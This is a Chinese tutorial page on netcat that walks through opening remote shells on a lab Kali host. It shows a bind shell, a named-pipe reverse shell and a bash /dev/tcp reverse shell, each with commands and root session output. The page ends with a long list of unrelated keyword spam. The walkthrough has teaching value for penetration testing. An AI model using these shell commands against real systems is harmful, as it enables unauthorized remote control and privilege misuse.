linux命令——nc
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,nc帮助文档上面说的是TCP/IP协议中的swiss army knife,是一个使用tcp或udp协议通过网络连接来读写数据的一个简单的多功能的工具!在***中经常用于反弹shell,用于交互式执行
千家信息网最后更新 2025年01月20日linux命令——nc
nc帮助文档上面说的是TCP/IP协议中的swiss army knife,是一个使用tcp或udp协议通过网络连接来读写数据的一个简单的多功能的工具!在***中经常用于反弹shell,用于交互式执行shell,或者用于提权!
基本使用语法:
nc 选项 IP port
基本参数说明:
-l:监听端口,监听入站信息-p:后跟本地端口号-v:显示端口的信息,多数人喜欢使用-vv,但是我用了没看到有什么区别
第一种方法:
第一种的话需要目标主机直接就是外网独立ip才可以,如果是通过内网映射出来的,就不适用这个方法了!
目标主机:
nc -lvp 2222 -e /bin/bash
root@kali:~# nc -lvp 2222 -e /bin/bashlistening on [any] 2222 ...
***主机:
nc 目标机IP 2222
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc 192.168.5.128 2222
此时我们查看目标主机:
root@kali:~# nc -lvp 2222 -e /bin/bashlistening on [any] 2222 ...192.168.5.1: inverse host lookup failed: Unknown hostconnect to [192.168.5.128] from (UNKNOWN) [192.168.5.1] 14960
此时我们在***机就可以执行命令了!
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc 192.168.5.128 2222whoamirootuname -aLinux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
第二种方法:
第二种方法,需要我们有独立外网ip,用于监听返回来的shell!
目标主机:
root@kali:~# mknod /tmp/backpipe proot@kali:~# /bin/sh 0/tmp/backpipe
***主机:
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc -lvp 2222lstn on [any] 2222 ..192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATAconnect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53404: NO_DATAwhoamirootuname -aLinux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
第三种:
第三种方法需要我们有独立的外网ip,用于接收shell!
目标主机:
root@kali:~# bash -i >& /dev/tcp/192.168.5.1/2222 0>&1
***主机:
F:\\eth20-CTF-Toolkits\\CTF工具包\\连接工具>nc -lvp 2222lstn on [any] 2222 ..192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATAconnect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53418: NO_DATAroot@kali:~# uname -auname -aLinux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linuxroot@kali:~# whoamiwhoamirootroot@kali:~#exit
工具
主机
目标
方法
工具包
独立
监听
信息
端口
命令
交互式
参数
口号
后跟
多功能
就是
数据
文档
网络
语法
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
视易点歌系统服务器
广州手机软件开发公司
国家论文数据库
网络安全处置情况说明
管理员如何远程管理服务器的
web数据库开发用什么语言
命运2 服务器
益阳正规软件开发价格
电子表格怎么连接外部数据库
网络安全本科阶段选什么专业
软件开发成本估算.ppt
互联车辆网络安全惹人忧黑客入侵
mysql+数据库不更新
路由器日志服务器设置
组态王利用数据库制作报表
美信网络技术有限公司av
易速互联服务器
读一个文件每一行数据库
诺基亚手机空间服务器
远程管理服务器是做什么的
泰坦陨落2服务器中断
重庆巫山食堂配送软件开发
南京宅速网络技术有限公司
数据库不符合第三范式
无网络安全模式选哪个
泗洪购买网络技术诚信服务
网络安全志愿活动的新闻标题
武汉市网络安全管理办法
网络安全人员派出管理
买服务器税率是多少石家庄